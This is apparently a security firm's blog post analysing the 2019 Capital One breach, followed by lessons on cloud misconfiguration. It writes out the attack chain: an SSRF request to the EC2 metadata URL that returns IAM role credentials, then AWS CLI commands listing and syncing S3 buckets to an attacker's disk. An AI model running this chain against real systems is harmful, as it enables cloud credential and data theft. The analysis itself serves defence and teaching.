This post attempts to explain the technical side of how the Capital One breach occurred, the impact of the breach and what you can do as a user of cloud services to prevent this from happening to you.
Updated 3rd December 2019 — Please note: AWS released an additional security defences against the attack mentioned in this blog post. While the methods described here will work with the legacy version of Instance Meta Data Service (IMDSv1), they will be thwarted by IMDSv2. Read our extensive blog post on how to utilise AWS EC2 IMDSv2 and add the additional defences for your EC2 machines
On July 29th, Capital One Financial Corporation announced that they had determined there was unauthorised access by an outside individual who obtained certain types of personal information relating to people who had applied for its credit card products and to Capital One credit card customers.
This event affected approximately 100 million individuals in the United States and approximately 6 million in Canada. The hacker gained access to data that included approximately 140,000 Social Security numbers and approximately 80,000 bank account numbers on U.S. consumers, and roughly 1 million Social Insurance Numbers (SINs) for Canadian credit card customers.
What happened from a technical viewpoint
The following is reconstruction of the attack and technical walk-through of what happened as uncovered in the investigation of this attack. A copy of the complaint can be found at https://www.justice.gov/usao-wdwa/press-release/file/1188626/download
- On July 19, 2019 a security researcher got in touch with Capital One via it’s responsible disclosure email address notifying them that they had discovered a public Github gist which contained the description of the attack along with the target that was attacked, the commands that were run and the list of AWS S3 buckets that contained the data that was stolen
- The attack to obtain the keys to gain access to S3 and the downloading of the data happened on March 22 and 23, 2019
The attacker gained access to a set of AWS access keys by accessing the AWS EC2 metadata service via a SSRF vulnerability. There is evidence that the application that was targeted was behind a Web Application Firewall (ModSecurity) but either a bypass was used or the WAF was not configured to block attacks (logging mode). The keys essentially allowed the attacker to list and sync the S3 buckets to a local disk thereby providing access to all the data contained in them.
In the security industry, amongst security researchers and bug bounty hunters, SSRF or Server Side Request Forgery is an extremely lucrative bug, especially when the infrastructure being targeted is on the cloud. SSRF occurs when a user supplied input is used to make a network/HTTP request to the user supplied input. So basically for an application or a service, if it accepts a URL, IP address or hostname from where it is supposed to go fetch data from, and you control this input, this could potentially be vulnerable to SSRF. Hackerone has a nice article to explain this in more detail.
When a web application hosted on a cloud VM instance (true for AWS, GCP, Azure, DigitalOcean etc.) becomes vulnerable to SSRF, it becomes possible to access an endpoint accessible only from the machine itself, called the Metadata endpoint. For AWS, no additional headers are required when accessing this endpoint and a request can be made to (always the same) endpoint of http://169.254.169.254/ to obtain metadata regarding the instance itself. This endpoint is accessible only from the machine itself. So you would need to be inside a shell environment on the machine to be run a curl or a wget for example to access the metadata endpoint. This is true for a service or a program running on the machine as well. Hence an SSRF allows an external attacker to access the endpoint because the request originates from the machine (server side) but sends the output to the attacker’s browser/client.
You can read more about the Metadata Service for AWS here — https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html
Interestingly, an important piece of information that can be pulled from the instance metadata service are credentials for a IAM Role that may have been attached to the instance. This is available at
It appears that this role had excessive privileges allowing the listing and access to S3 storage. This privilege was used to list the buckets and download them locally. The attacker seems to have used TOR to hide their real IP when performing this action.
- Accessing the credentials using the SSRF bug
- The attacker seems to have accessed the AWS credentials for a role called
ISRM-WAF-Rolevia the endpoint
http://169.254.169.254/latest/meta-data/iam/security-credentials/ISRM-WAF-Roleusing the SSRF bug.
For example, if the vulnerable application was at
http://example.com and the SSRF existed in a GET variable called
url, then the exploitation was possible as
Given that the role name has the string
WAF in it, it is speculated that the exploitation was not as straightforward as the URL above but a bypass was used for the WAF (ModSecurity) in this case. Some common bypasses are available at https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server Side Request Forgery
A sample output of what is visible when the AWS credentials for an attached IAM role are requested via the instance metadata is shown below
2. Adding the credentials to the local AWS CLI
- Very likely the next step the attacker took was to add the discovered credentials to their local AWS CLI using the
aws configurecommand. A key difference to the credentials when obtained for a IAM User using IAM and a role when accessed through the metadata instance is the presence of a token. This token cannot be added using the
aws configurecommand directly but needs to be added to the environment variable or the
aws_session_tokenusing a text editor.
~/.aws/credentials file with a AWS CLI profile called
examplelooks like this
3. Gaining access to the data in S3
Lastly, once the credentials are added, you can see if you are setup properly by making a call to AWS STS to check your identity. The command to do this is
aws sts get-caller-identity --profile example. The output of this command shows the User Id, account number and the ARN (Amazon Resource Number). A sample output is shown below
This command is akin to the
whoami command for pentesters to figure who they are on a system they have compromised (who do these AWS keys belong to).
Once the AWS CLI is setup with the stolen keys and token, the attacker ran the command to list buckets available in the account. For a properly restricted IAM role, this command should have failed, but in this case, it appears that the IAM Role had permissions it should not have had
aws s3 ls --profile example
This lists the names of all the S3 buckets in the account that the IAM Role can see (which in this case was all of them). The attacker then went ahead and ran the sync command to download the contents of over 700 S3 buckets locally. For example, a S3 sync command that the attacker ran would have looked like this
aws s3 sync s3://bucket-credit-card-numbers /home/attacker/localstash/capitalone/ --profile example
Points of failure
There were multiple mis-configurations and lapses in the configuration and programming that led to a successful breach. The ones that are evident from what’s available now in various records are
- An application code review / vulnerability assessment should have caught the SSRF bug in the web application. One of the more common weaknesses we discover in web applications running on the cloud is the application’s trust on user supplied data to make requests from the server. Sometimes the application accepts a file name as user input but providing a complete URL causes a web request to be triggered instead of a local file being read. In other cases, a bug like command injection allows you to terminate the current command and execute a curl or wget from the server. In any case, if user input is going to be used on the server without making sure it is safe to be used in the context in which the user data is processed, a vulnerability will occur.
- Providing permissions to the
ISRM-WAF-Rolethat were probably not needed. When the credentials for the IAM Role were leaked, unless required by the application or the AWS instance to work with S3 buckets, S3 related permissions should not have been provided to the IAM Role. A key finding that we encounter when auditing AWS cloud configurations for our customers is with misconfigured roles and permissions. A lot of developers and Ops, to make things work, still rely on the dangerous
"Effect": "Allow", "Action": "*","Resource": "*"policy effectively giving the IAM Role AWS Administrative rights.
- Data storage in AWS S3 was not encrypted. This probably would not have made a lot of difference, especially since the IAM Role potentially had administrative permissions. The IAM role would very likely allow the attacker to download an SSE-KMS-encrypted object from the S3 buckets as the role would have the neccessary permission to decrypt the AWS KMS key.
- Lastly, the absence of monitoring for IAM and AWS STS API Calls with AWS CloudTrail and monitoring for S3 read (or writes) given the sensitive nature of data therein. Ironically, Capital One is the creator of a tool called Cloud Custodian that can be (and is actively used by a lot of folk on the Internet) used to manage AWS, Azure, and GCP environments by ensuring real time compliance to security policies (like encryption and access requirements), tag policies, and cost management via garbage collection of unused resources and off-hours resource management.
Final thoughts to Note — This is not a new bug
This attack was particularly interesting as we woke up to the news because we at Appsecco have been teaching security testing teams and penetration testers on how to discover, identify and exploit SSRF for over half a decade in our Xtreme Web Hacking class. For the last 3 years we have covered a variant of this in our “Breaking and Owning Applications and Servers on AWS and Azure class (discover and exploit) and in our Automated Defence training that we run at BlackHat (how to automatically defend against this vulnerability in AWS)”.
Given the complexity of cloud services and the ease at which mis-configurations can occur because systems need to become usable and functional as soon as possible, it is important to approach cloud infrastructure with a defence in depth approach, especially when dealing with data whose unauthorised access can lead to legal issues and compliance failures.
If you want us to take a look at your cloud hosted web applications or your cloud architecture to simulate attacks and identify weaknesses before the bad guys do, get in touch with us.